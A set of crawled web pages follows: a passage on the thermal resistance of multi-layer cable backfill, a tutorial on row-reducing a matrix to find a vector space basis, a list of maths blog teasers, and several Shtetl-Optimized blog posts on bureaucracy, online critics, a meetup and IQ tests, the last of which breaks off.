All resistances $R_q$ are calculated once for the side with shorter distance to the backfill boundary, and once for the other side. The resistances were defined in the paper by R. de Lieto Vollaro et.al: 'Experimental study of thermal field deriving from an underground electrical power cable buried in non-homogeneous soils', 2014.The total resistance to ambient $T_{4iii}$ is calculated by taking the two values of $R_{CG}$ for the two sides in parallel.
Range of variability of the controlling parameters:
$s_{b1}$[m] $s_{b2}$[m] $s_{b3}$[m] $w_b$[m] $L_{b4}$[m] $L_{cm}$[m] $s_{b4}$[m] $w_b$/$L_{b4}$ $ρ_{b1}$[K.m/W] $ρ_{b2}$[K.m/W] $ρ_{b}$[K.m/W] $ρ_{4}$[K.m/W] min 0.048 0.2 0.3 0.41 1.02 0.66 0.17 0.215 0.52 0.52 0.52 0.31 max 0.16 1.5 1.3 1.4 2.55 2.24 0.48 1.264 9.80 9.52 7.14 8.62
Within the range of variability as given in the paper by R. de Lieto Vollaro et.al: 'Thermal analysis of underground electrical power cables buried in non-homogeneous soils', 2011, the best fit of the numerical data for the overall thermal resistance $R_{CG}$ was derived by way of Montecarlo optimization method. The method has a 3.6 % standard deviation of error and a 10 % range of relative error with a 98 % level of confidence. The paper points out that if the trench is filled with a single backfilling material (i.e., $\rho_{b1}$ = $\rho_{b2}$ = $\rho_{b}$), which means that the method from IEC 60287 can be applied, the range of relative error of the results obtained through the IEC method is +/- 35 %. Whenever the trench is filled with layers of different materials stacked one above the other, the only possibility of application of the IEC 60287 is to replace the actual multiple filling of the trench with a single fictitious material having an equivalent thermal resistivity given by the weighted average of the thermal resistivities of the backfilling layers and the cable bedding, in which the weights are their thicknesses. In such case, the order of the errors is noticeably much higher with +250 / -45 % than that corresponding to the use of the multi-layer method.
Symbol
$R_{CG}$
Unit
K.m/W
Formulae
$\frac{1}{\frac{1}{R_{q11}+R_{q12}+R_{q13}}+\frac{1}{R_{q21}+R_{q22}}+\frac{1}{R_{q31}+R_{q32}}}$
Related
$R_{q11}$
$R_{q12}$
$R_{q13}$
$R_{q21}$
$R_{q22}$
$R_{q31}$
$R_{q32}$
$T_{4iii}$
Image
Arrangement, heat flow paths and thermal resistances of multi-layer backfill | 2022-01-24 17:14:12 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.798019289970398, "perplexity": 957.8182744526514}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320304572.73/warc/CC-MAIN-20220124155118-20220124185118-00289.warc.gz"} |
https://astarmathsandphysics.com/university-maths-notes/matrices-and-linear-algebra/4350-reducing-a-matrix-to-row-reduced-echelon-form-to-find-a-basis-for-a-vector-space.html?tmpl=component&print=1&page= | Reducing a Matrix to Row Reduced Echelon Form to Find a Basis for a Vector Space
Suppose we have a vector space
$V$
, a subset of
$\mathbb{R}^4$
spanned by the the vectors
$\left\{ \begin{pmatrix}1\\2\\1\\2\end{pmatrix} , \begin{pmatrix}2\\1\\2\\1\end{pmatrix} , \begin{pmatrix}3\\2\\3\\2\end{pmatrix} , \begin{pmatrix}3\\3\\3\\3\end{pmatrix} , \begin{pmatrix}5\\3\\5\\3\end{pmatrix} \right\}$
We want to find a subset of this spanning set that is a basis for
$V$
.
From the set of vectors form the a matrix with rows equal to the vectors.
$\left( \begin{array}{cccc} 1 & 2 & 1 & 2 \\ 2 & 1 & 2 & 1 \\ 3 & 2 & 3 & 2 \\ 3 & 3 & 3 & 3 \\ 5 & 3 & 5 & 3 \end{array} \right)$
Now perform elementary row operations - adding or subtracting multiples of each row, interchanging rows, or scaling rows - to find the row reduced echelon form of the matrix.
Subtract two times row 1 from row 2, subtract 3 times row 1 from rows 3 and 4, and subtract 5 times row 1 from row 5. We get
$\left( \begin{array}{cccc} 1 & 2 & 1 & 2 \\ 0 & -3 & 0 & -3 \\ 0 & -4 & 0 & -4 \\ 0 & -3 & 0 & -3 \\ 0 & -7 & 0 & -7 \end{array} \right)$
Divide row 2 by -3
$\left( \begin{array}{cccc} 1 & 2 & 1 & 2 \\ 0 & 1 & 0 & 1 \\ 0 & -4 & 0 & -4 \\ 0 & -3 & 0 & -3 \\ 0 & -7 & 0 & -7 \end{array} \right)$
Subtract times row 2 from row 1, add four times row 2 to row 3, add three times row 2 to row 4 and add seven times row 2 to row 5.
$\left( \begin{array}{cccc} 1 & 0 & 1 & 0 \\ 0 & 1 & 0 & 1 \\ 0 & 0 & 0 & 0 \\ 0 & 0 & 0 & 0 \\ 0 & 0 & 0 & 0 \end{array} \right)$
This is the row reduced echelon form of the matrix.
A basis for
$V$
is then
$\left\{ \begin{pmatrix}1\\0\\1\\0\end{pmatrix} , \begin{pmatrix}0\\1\\0\\1\end{pmatrix} \right\}$ | 2017-12-16 11:19:12 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8278919458389282, "perplexity": 146.67487705337643}, "config": {"markdown_headings": false, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948587577.92/warc/CC-MAIN-20171216104016-20171216130016-00535.warc.gz"} |
https://www.flyingcoloursmaths.co.uk/blog/page/10/ | # The Flying Colours Maths Blog: Latest posts
## Proofs
A question that comes up a lot in class is, “how do you get good at proofs?” (It’s usually framed as “I don’t like proofs”, but we’re not having any of that negativity here, thank you very much.) I don’t have a silver bullet for that. I do have some
## Ask Uncle Colin: A horrible CDF
Dear Uncle Colin I have the set-up below - how do I find the cumulative density function for $d^2$? - Circles Don’t Fit Hi, CDF, and thanks for your message! Before I start, I’m going to make two simplifying assumptions that don’t change anything1 - that the radius of the
## Dictionary of Mathematical Eponymy: Noether’s Theorem
We’ve just reached the halfway point of the Dictionary of Mathematical Eponymy project, and it’s time for a fairly famous one (and again, one I’ve been meaning to understand better). What is Noether’s Theorem? Emmy Noether has several theorems named for her, but the first (and probably most important) can
## Ask Uncle Colin: Dividing by halves
Dear Uncle Colin, Why is dividing by a half the same as doubling? - How Arithmetic Leverages Fractions Hi, HALF, and thanks for your message! I’m going to give a couple of reasons: first, the algebra of it, then the logic. Algebra Let’s set this up as $\frac{x}{\br{\frac{1}{2}}} = y$
## “How many days old are you?”
“How old are you?” asked young Fred. (This is not, technically, an ‘Ask Uncle Colin’. It’s an ‘Ask Daddy’.) “I’m 42, buddy.” “42 days?” “No, 42 years!” “Oh. But how many days is that?” It is not quite 7:15am on New Year’s Day. I have not yet had my coffee.
## Wrong, but Useful: Episode 75
In episode 75 of Wrong, but Useful, we talk with @astrastefania, who is Stefania Delprete in real life. We discuss: Dreams about Maths and doing Maths in lucid dreams Goodreads maths reading challenge Newsletters I like: Stuff Evelyn Wants You To Read by @evelynjlamb and and Fair Warning by @SophieWarnes
## A “Components” Enigma
Dear Uncle Colin, Help! I’m working on a top-secret project somewhere in Buckinghamshire. I can tell you that it involves… components. The… machine has three slots for components, and there are five different components available (one of each) - so there are 60 ways to arrange the components. There’s a
## A few logarithmic tricks
I love a good logarithm. Logarithms are a standby for when I want to work something out ninja-style, and there’s something very satisfying about taking something horrible in the powers, bringing it down to the working line, and finding that it wasn’t so horrible after all. I’m an old hand, | 2020-11-29 13:16:10 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6214379668235779, "perplexity": 3018.4327768096496}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-50/segments/1606141198409.43/warc/CC-MAIN-20201129123729-20201129153729-00274.warc.gz"} |
https://www.scottaaronson.com/blog/?cat=11 | ## Archive for the ‘Nerd Interest’ Category
### Review of “Inadequate Equilibria,” by Eliezer Yudkowsky
Thursday, November 16th, 2017
Inadequate Equilibria: Where and How Civilizations Get Stuck is a little gem of a book: wise, funny, and best of all useful (and just made available for free on the web). Eliezer Yudkowsky and I haven’t always agreed about everything, but on the subject of bureaucracies and how they fail, his insights are gold. This book is one of the finest things he’s written. It helped me reflect on my own choices in life, and it will help you reflect on yours.
The book is a 120-page meditation on a question that’s obsessed me as much as it’s obsessed Yudkowsky. Namely: when, if ever, is it rationally justifiable to act as if you know better than our civilization’s “leading experts”? And if you go that route, then how do you answer the voices—not least, the voices in your own head—that call you arrogant, hubristic, even a potential crackpot?
Yudkowsky gives a nuanced answer. To summarize, he argues that contrarianism usually won’t work if your goal is to outcompete many other actors in a free market for a scarce resource that they all want too, like money or status or fame. In those situations, you really should ask yourself why, if your idea is so wonderful, it’s not already being implemented. On the other hand, contrarianism can make sense when the “authoritative institutions” of a given field have screwed-up incentives that prevent them from adopting sensible policies—when even many of the actual experts might know that you’re right, but something prevents them from acting on their knowledge. So for example, if a random blogger offers a detailed argument for why the Bank of Japan is pursuing an insane fiscal policy, it’s a-priori plausible that the random blogger could be right and the Bank of Japan could be wrong (as actually happened in a case Yudkowsky recounts), since even insiders who knew the blogger was right would find it difficult to act on their knowledge. The same wouldn’t be true if the random blogger said that IBM stock was mispriced or that P≠NP is easy to prove.
The high point of the book is a 50-page dialogue between two humans and an extraterrestrial visitor. The extraterrestrial is confused about a single point: why are thousands of babies in the United States dying every year, or suffering permanent brain damage, because (this seems actually to be true…) the FDA won’t approve an intravenous baby food with the right mix of fats in it? Just to answer that one question, the humans end up having to take the alien on a horror tour through what’s broken all across the modern world, from politicians to voters to journalists to granting agencies, explaining Nash equilibrium after Nash equilibrium that leaves everybody worse off but that no one can unilaterally break out of.
I do have two criticisms of the book, both relatively minor compared to what I loved about it.
First, Yudkowsky is brilliant in explaining how institutions can produce terrible outcomes even when all the individuals in them are smart and well-intentioned—but he doesn’t address the question of whether we even need to invoke those mechanisms for more than a small minority of cases. In my own experience struggling against bureaucracies that made life hellish for no reason, I’d say that about 2/3 of the time my quest for answers really did terminate at an identifiable “empty skull”: i.e., a single individual who could unilaterally solve the problem at no cost to anyone, but chose not to. It simply wasn’t the case, I don’t think, that I would’ve been equally obstinate in the bureaucrat’s place, or that any of my friends or colleagues would’ve been. I simply had to accept that I was now face-to-face with an alien sub-intelligence—i.e., with a mind that fetishized rules made up by not-very-thoughtful humans over demonstrable realities of the external world.
Second, I think the quality of the book noticeably declines in the last third. Here Yudkowsky recounts conversations in which he tried to give people advice, but he redacts all the object-level details of the conversations—so the reader is left thinking that this advice would be good for some possible values of the missing details, and terrible for other possible values! So then it’s hard to take away much of value.
In more detail, Yudkowsky writes:
“If you want to use experiment to show that a certain theory or methodology fails, you need to give advocates of the theory/methodology a chance to say beforehand what they think they predict, so the prediction is on the record and neither side can move the goalposts.”
I only partly agree with this statement (which might be my first substantive disagreement in the book…).
Yes, the advocates should be given a chance to say what they think the theory predicts, but then their answer need not be taken as dispositive. For if the advocates are taken to have ultimate say over what their theory predicts, then they have almost unlimited room to twist themselves in pretzels to explain why, yes, we all know this particular experiment will probably yield such-and-such result, but contrary to appearances it won’t affect the theory at all. For science to work, theories need to have a certain autonomy from their creators and advocates—to be “rigid,” as David Deutsch puts it—so that anyone can see what they predict, and the advocates don’t need to be continually consulted about it. Of course this needs to be balanced, in practice, against the fact that the advocates probably understand how to use the theory better than anyone else, but it’s a real consideration as well.
In one conversation, Yudkowsky presents himself as telling startup founders not to bother putting their prototype in front of users, until they have a testable hypothesis that can be confirmed or ruled out by the users’ reactions. I confess to more sympathy here with the startup founders than with Yudkowsky. It does seem like an excellent idea to get a product in front of users as early as possible, and to observe their reactions to it: crucially, not just a binary answer (do they like the product or not), confirming or refuting a prediction, but more importantly, reactions that you hadn’t even thought to ask about. (E.g., that the cool features of your website never even enter into the assessment of it, because people can’t figure out how to create an account, or some such.)
More broadly, I’d stress the value of the exploratory phase in science—the phase where you just play around with your system and see what happens, without necessarily knowing yet what hypothesis you want to test. Indeed, this phase is often what leads to formulating a testable hypothesis.
But let me step back from these quibbles, to address something more interesting: what can I, personally, take from Inadequate Equilibria? Is academic theoretical computer science broken/inadequate in the same way a lot of other institutions are? Well, it seems to me that we have some built-in advantages that keep us from being as broken as we might otherwise be. For one thing, we’re overflowing with well-defined problems, which anyone, including a total outsider, can get credit for solving. (Of course, the “outsider” might not retain that status for long.) For another, we have no Institutional Review Boards and don’t need any expensive equipment, so the cost to enter the field is close to zero. Still, we could clearly be doing better: why didn’t we invent Bitcoin? Why didn’t we invent quantum computing? (We did lay some of the intellectual foundations for both of them, but why did it take people outside TCS to go the distance?) Do we value mathematical pyrotechnics too highly compared to simple but revolutionary insights? It’s worth noting that a whole conference, Innovations in Theoretical Computer Science, was explicitly founded to try to address that problem—but while ITCS is a lovely conference that I’ve happily participated in, it doesn’t seem to have succeeded at changing community norms much. Instead, ITCS itself converged to look a lot like the rest of the field.
Now for a still more pointed question: am I, personally, too conformist or status-conscious? I think even “conformist” choices I’ve made, like staying in academia, can be defended as the right ones for what I wanted to do with my life, just as Eliezer’s non-conformist choices (e.g., dropping out of high school) can be defended as the right ones for what he wanted to do with his. On the other hand, my acute awareness of social status, and when I lacked any—in contrast to what Eliezer calls his “status blindness,” something that I see as a tremendous gift—did indeed make my life unnecessarily miserable in all sorts of ways.
Anyway, go read Inadequate Equilibria, then venture into the world and look for some $20 bills laying on the street. And if you find any, come back and leave a comment on this post explaining where they are, so a conformist herd can follow you. ### Not the critic who counts Wednesday, October 11th, 2017 There’s a website called Stop Timothy Gowers! !!! —yes, that’s the precise name, including the exclamation points. The site is run by a mathematician who for years went under the pseudonym “owl / sowa,” but who’s since outed himself as Nikolai Ivanov. For those who don’t know, Sir Timothy Gowers is a Fields Medalist, known for seminal contributions including the construction of Banach spaces with strange properties, the introduction of the Gowers norm, explicit bounds for the regularity lemma, and more—but who’s known at least as well for explaining math, in his blog, books, essays, MathOverflow, and elsewhere, in a remarkably clear, friendly, and accessible way. He’s also been a leader in the fight to free academia from predatory publishers. So why on earth would a person like that need to be stopped? According to sowa, because Gowers, along with other disreputable characters like Terry Tao and Endre Szemerédi and the late Paul Erdös, represents a dangerous style of doing mathematics: a style that’s just as enamored of concrete problems as it is of abstract theory-building, and that doesn’t even mind connections to other fields like theoretical computer science. If that style becomes popular with young people, it will prevent faculty positions and prestigious prizes from going to the only deserving kind of mathematics: the kind exemplified by Bourbaki and by Alexander Grothendieck, which builds up theoretical frameworks with principled disdain for the solving of simple-to-state problems. Mathematical prizes going to the wrong people—or even going to the right people but presented by the wrong people—are constant preoccupations of sowa’s. Read his blog and let me know if I’ve unfairly characterized it. Now for something totally unrelated. I recently discovered a forum on Reddit called SneerClub, which, as its name suggests, is devoted to sneering. At whom? Basically, at anyone who writes anything nice about nerds or Silicon Valley, or who’s associated with the “rationalist community,” or the Effective Altruist movement, or futurism or AI risk. Typical targets include Scott Alexander, Eliezer Yudkowsky, Robin Hanson, Michael Vassar, Julia Galef, Paul Graham, Ray Kurzweil, Elon Musk … and with a list like that, I guess I should be honored to be a regular target too. The basic SneerClub M.O. is to seize on a sentence that, when ripped from context and reflected through enough hermeneutic funhouse mirrors, can make nerds out to look like right-wing villains, oppressing the downtrodden with rays of disgusting white maleness (even, it seems, ones who aren’t actually white or male). So even if the nerd under discussion turns out to be, say, a leftist or a major donor to anti-Trump causes or malaria prevention or whatever, readers can feel reassured that their preexisting contempt was morally justified after all. Thus: Eliezer Yudkowsky once wrote a piece of fiction in which a character, breaking the fourth wall, comments that another character seems to have no reason to be in the story. This shows that Eliezer is a fascist who sees people unlike himself as having no reason to exist, and who’d probably exterminate them if he could. Or: many rationalist nerds spend a lot of effort arguing against Trumpists, alt-righters, and neoreactionaries. The fact that they interact with those people, in order to rebut them, shows that they’re probably closet neoreactionaries themselves. When I browse sites like “Stop Timothy Gowers! !!!” or SneerClub, I tend to get depressed about the world—and yet I keep browsing, out of a fascination that I don’t fully understand. I ask myself: how can a person read Gowers’s blog, or Slate Star Codex, without seeing what I see, which is basically luminous beacons of intellectual honesty and curiosity and clear thought and sparkling prose and charity to dissenting views, shining out far across the darkness of online discourse? (Incidentally, Gowers lists “Stop Timothy Gowers! !!!” in his blogroll, and I likewise learned of SneerClub only because Scott Alexander linked to it.) I’m well aware that this very question will only prompt more sneers. From the sneerers’ perspective, they and their friends are the beacons, while Gowers or Scott Alexander are the darkness. How could a neutral observer possibly decide who was right? But then I reflect that there’s at least one glaring asymmetry between the sides. If you read Timothy Gowers’s blog, one thing you’ll constantly notice is mathematics. When he’s not weighing in on current events—for example, writing against Brexit, Elsevier, or the destruction of a math department by cost-cutting bureaucrats—Gowers is usually found delighting in exploring a new problem, or finding a new way to explain a known result. Often, as with his dialogue with John Baez and others about the recent “p=t” breakthrough, Gowers is struggling to understand an unfamiliar piece of mathematics—and, completely unafraid of looking like an undergrad rather than a Fields Medalist, he simply shares each step of his journey, mistakes and all, inviting you to follow for as long as you can keep up. Personally, I find it electrifying: why can’t all mathematicians write like that? By contrast, when you read sowa’s blog, for all the anger about the sullying of mathematics by unworthy practitioners, there’s a striking absence of mathematical exposition. Not once does sowa ever say: “OK, forget about the controversy. Since you’re here, instead of just telling you about the epochal greatness of Grothendieck, let me walk you through an example. Let me share a beautiful little insight that came out of his approach, in so self-contained a way that even a physicist or computer scientist will understand it.” In other words, sowa never uses his blog to do what Gowers does every day. Sowa might respond that that’s what papers are for—but the thing about a blog is that it gives you the chance to reach a much wider readership than your papers do. If someone is already blogging anyway, why wouldn’t they seize that chance to share something they love? Similar comments apply to Slate Star Codex versus r/SneerClub. When I read an SSC post, even if I vehemently disagree with the central thesis (which, yes, happens sometimes), I always leave the diner intellectually sated. For the rest of the day, my brain is bloated with new historical tidbits, or a deep-dive into the effects of a psychiatric drug I’d never heard of, or a jaw-dropping firsthand account of life as a medical resident, or a different way to think about a philosophical problem—or, if nothing else, some wicked puns and turns of phrase. But when I visit r/SneerClub—well, I get exactly what’s advertised on the tin. Once you’ve read a few, the sneers become pretty predictable. I thought that for sure, I’d occasionally find something like: “look, we all agree that Eliezer Yudkowsky and Elon Musk and Nick Bostrom are talking out their asses about AI, and are coddled white male emotional toddlers to boot. But even granting that, what do we think about AI? Are intelligences vastly smarter than humans possible? If not, then what principle rules them out? What, if anything, can be said about what a superintelligent being would do, or want? Just for fun, let’s explore this a little: I mean the actual questions themselves, not the psychological reasons why others explore them.” That never happens. Why not? There’s another fascinating Reddit forum called “RoastMe”, where people submit a photo of themselves holding a sign expressing their desire to be “roasted”—and then hundreds of Redditors duly oblige, savagely mocking the person’s appearance and anything else they can learn about the person from their profile. Many of the roasts are so merciless that one winces vicariously for the poor schmucks who signed up for this, hopes that they won’t be driven to self-harm or suicide. But browse enough roasts, and a realization starts to sink in: there’s no person, however beautiful or interesting they might’ve seemed a priori, for whom this roasting can’t be accomplished. And that very generality makes the roasting lose much of its power—which maybe, optimistically, was the point of the whole exercise? In the same way, spend a few days browsing SneerClub, and the truth hits you: once you’ve made their enemies list, there’s nothing you could possibly say or do that they wouldn’t sneer at. Like, say it’s a nice day outside, and someone will reply: “holy crap how much of an entitled nerdbro do you have to be, to erase all the marginalized people for whom the day is anything but ‘nice’—or who might be unable to go outside at all, because of limited mobility or other factors never even considered in these little rich white boys’ geek utopia?” For me, this realization is liberating. If appeasement of those who hate you is doomed to fail, why bother even embarking on it? I’ve spent a lot of time on this blog criticizing D-Wave, and cringeworthy popular articles about quantum computing, and touted arXiv preprints that say wrong things. But I hope regular readers feel like I’ve also tried to offer something positive: y’know, actual progress in quantum computing that actually excites me, or a talk about big numbers, or an explanation of the Bekenstein bound, whatever. My experience with sites like “Stop Timothy Gowers! !!!” and SneerClub makes me feel like I ought to be doing less criticizing and more positive stuff. Why, because I fear turning into a sneerer myself? No, it’s subtler than that: because reading the sneerers drives home for me that it’s a fool’s quest to try to become what Scott Alexander once called an “apex predator of the signalling world.” At the risk of stating the obvious: if you write, for example, that Richard Feynman was a self-aggrandizing chauvinist showboater, then even if your remarks have a nonzero inner product with the truth, you don’t thereby “transcend” Feynman and stand above him, in the same way that set theory transcends and stands above arithmetic by constructing a model for it. Feynman’s achievements don’t thereby become your achievements. When I was in college, I devoured Ray Monk’s two-volume biography of Bertrand Russell. This is a superb work of scholarship, which I warmly recommend to everyone. But there’s one problem with it: Monk is constantly harping on his subject’s failures, and he has no sense of humor, and Russell does. The result is that, whenever Monk quotes Russell’s personal letters at length to prove what a jerk Russell was, the quoted passages just leap off the page—as if old Bertie has come back from the dead to share a laugh with you, the reader, while his biographer looks on sternly and says, “you two think this is funny?” For a writer, I can think of no higher aspiration than that: to write like Bertrand Russell or like Scott Alexander—in such a way that, even when people quote you to stand above you, your words break free of the imprisoning quotation marks, wiggle past the critics, and enter the minds of readers of your generation and of generations not yet born. Update (Nov. 13): Since apparently some people didn’t know (?!), the title of this post comes from the famous Teddy Roosevelt quote: It is not the critic who counts; not the man who points out how the strong man stumbles, or where the doer of deeds could have done them better. The credit belongs to the man who is actually in the arena, whose face is marred by dust and sweat and blood; who strives valiantly; who errs, who comes short again and again, because there is no effort without error and shortcoming; but who does actually strive to do the deeds; who knows great enthusiasms, the great devotions; who spends himself in a worthy cause; who at the best knows in the end the triumph of high achievement, and who at the worst, if he fails, at least fails while daring greatly, so that his place shall never be with those cold and timid souls who neither know victory nor defeat. ### Coming to Nerd Central Sunday, October 8th, 2017 While I’m generally on sabbatical in Tel Aviv this year, I’ll be in the Bay Area from Saturday Oct. 14 through Wednesday Oct. 18, where I look forward to seeing many friends new and old. On Wednesday evening, I’ll be giving a public talk in Berkeley, through the Simons Institute’s “Theoretically Speaking” series, entitled Black Holes, Firewalls, and the Limits of Quantum Computers. I hope to see at least a few of you there! (I do have readers in the Bay Area, don’t I?) But there’s more: on Saturday Oct. 14, I’m thinking of having a first-ever Shtetl-Optimized meetup, somewhere near the Berkeley campus. Which will also be a Slate Star Codex meetup, because Scott Alexander will be there too. We haven’t figured out many details yet, except that it will definitively involve getting fruit smoothies from one of the places I remember as a grad student. Possible discussion topics include what the math, CS, and physics research communities could be doing better; how to advance Enlightenment values in an age of recrudescent totalitarianism; and (if we’re feeling really ambitious) the interpretation of quantum mechanics. If you’re interested, shoot me an email, let me know if there are times that don’t work; then other Scott and I will figure out a plan and make an announcement. On an unrelated note, some people might enjoy my answer to a MathOverflow question about why one should’ve expected number theory to be so rife with ridiculously easy-to-state yet hard-to-prove conjectures, like Fermat’s Last Theorem and the Goldbach Conjecture. As I’ve discussed on this blog before, I’ve been deeply impressed with MathOverflow since the beginning, but never more so than today, when a decision to close the question as “off-topic” was rightfully overruled. If there’s any idea that unites all theoretical computer scientists, I’d say it’s the idea that what makes a given kind of mathematics “easy” or “hard” is, itself, a proper subject for mathematical inquiry. ### Also against individual IQ worries Sunday, October 1st, 2017 Scott Alexander recently blogged “Against Individual IQ Worries.” Apparently, he gets many readers writing to him terrified that they scored too low on an IQ test, and therefore they’ll never be able to pursue their chosen career, or be a full-fledged intellectual or member of the rationalist community or whatever. Amusingly, other Scott says, some of these readers have even performed their own detailed Bayesian analysis of what it might mean that their IQ score is only 90, cogently weighing the arguments and counterarguments while deploying the full vocabulary of statistical research. It somehow reminds me of the joke about the talking dog, who frets to his owner that he doesn’t think he’s articulate enough to justify all the media attention he’s getting. I’ve long had mixed feelings about the entire concept of IQ. On the one hand, I know all the studies that show that IQ is highly heritable, that it’s predictive of all sorts of life outcomes, etc. etc. I’m also aware of the practical benefits of IQ research, many of which put anti-IQ leftists into an uncomfortable position: for example, the world might never have understood the risks of lead poisoning without studies showing how they depressed IQ. And as for the thousands of writers who dismiss the concept of IQ in favor of grit, multiple intelligences, emotional intelligence, or whatever else is the flavor of the week … well, I can fully agree about the importance of the latter qualities, but can’t go along with many of those writers’ barely-concealed impulse to lower the social status of STEM nerds even further, or to enforce a world where the things nerds are good at don’t matter. On the other hand … well, have you actually looked at an IQ test? To anyone with a scientific or mathematical bent, the tests are vaguely horrifying. “Which of these pictures is unlike the others?” “What number comes next in the sequence?” Question after question that could have multiple defensible valid answers, but only one that “counts”—and that, therefore, mostly tests the social skill of reverse-engineering what the test-writer had in mind. As a teacher, I’d be embarrassed to put such questions on an exam. I sometimes get asked what my IQ is. The truth is that, as far as I know, I was given one official IQ test, when I was four years old, and my score was about 106. The tester earnestly explained to my parents that, while I scored off the chart on some subtests, I completely bombed others, and averaging yielded 106. As a representative example of what I got wrong, the tester offered my parents the following: Tester: “Suppose you came home, and you saw smoke coming out of your neighbor’s roof. What would you do?” Me: “Probably nothing, because it’s just the chimney, and they have a fire in their fireplace.” Tester: “OK, but suppose it wasn’t the chimney.” Me: “Well then, I’d either call for help or not, depending on how much I liked my neighbor…” Apparently, my parents later consulted other psychologists who were of the opinion that my IQ was higher. But the point remains: if IQ is defined as your score on a professionally administered IQ test, then mine is about 106. Richard Feynman famously scored only 124 on a childhood IQ test—above average, but below the cutoff for most schools’ “gifted and talented” programs. After he won the Nobel Prize in Physics, he reportedly said that the prize itself was no big deal; what he was really proud of was to have received one despite a merely 124 IQ. If so, then it seems to me that I can feel equally proud, to have completed a computer science PhD at age 22, become a tenured MIT professor, etc. etc. despite a much lower IQ even than Feynman’s. But seriously: how do we explain Feynman’s score? Well, when you read IQ enthusiasts, you find what they really love is not IQ itself, but rather “g“, a statistical construct derived via factor analysis: something that positively correlates with just about every measurable intellectual ability, but that isn’t itself directly measurable (at least, not by any test yet devised). An IQ test is merely one particular instrument that happens to correlate well with g—not necessarily the best one for all purposes. The SAT also correlates with g—indeed, almost as well as IQ tests themselves do, despite the idea (or pretense?) that the SAT measures “acquired knowledge.” These correlations are important, but they allow for numerous and massive outliers. So, not for the first time, I find myself in complete agreement with Scott Alexander, when he advises people to stop worrying. We can uphold every statistical study that’s ever been done correlating IQ with other variables, while still affirming that fretting about your own low IQ score is almost as silly as fretting that you must be dumb because your bookshelf is too empty (a measurable variable that also presumably correlates with g). More to the point: if you want to know, let’s say, whether you can succeed as a physicist, then surely the best way to find out is to start studying physics and see how well you do. That will give you a much more accurate signal than a gross consumer index like IQ will—and conditioned on that signal, I’m guessing that your IQ score will provide almost zero additional information. (Though then again, what would a guy with a 106 IQ know about such things?) ### What I believe II (ft. Sarah Constantin and Stacey Jeffery) Tuesday, August 15th, 2017 Unrelated Update: To everyone who keeps asking me about the “new” P≠NP proof: I’d again bet$200,000 that the paper won’t stand, except that the last time I tried that, it didn’t achieve its purpose, which was to get people to stop asking me about it. So: please stop asking, and if the thing hasn’t been refuted by the end of the week, you can come back and tell me I was a closed-minded fool.
In my post “The Kolmogorov Option,” I tried to step back from current controversies, and use history to reflect on the broader question of how nerds should behave when their penchant for speaking unpopular truths collides head-on with their desire to be kind and decent and charitable, and to be judged as such by their culture. I was gratified to get positive feedback about this approach from men and women all over the ideological spectrum.
However, a few people who I like and respect accused me of “dogwhistling.” They warned, in particular, that if I wouldn’t just come out and say what I thought about the James Damore Google memo thing, then people would assume the very worst—even though, of course, my friends themselves knew better.
So in this post, I’ll come out and say what I think. But first, I’ll do something even better: I’ll hand the podium over to two friends, Sarah Constantin and Stacey Jeffery, both of whom were kind enough to email me detailed thoughts in response to my Kolmogorov post.
Sarah Constantin completed her PhD in math at Yale. I don’t think I’ve met her in person yet, but we have a huge number of mutual friends in the so-called “rationalist community.” Whenever Sarah emails me about something I’ve written, I pay extremely close attention, because I have yet to read a single thing by her that wasn’t full of insight and good sense. I strongly urge anyone who likes her beautiful essay below to check out her blog, which is called Otium.
Sarah Constantin’s Commentary:
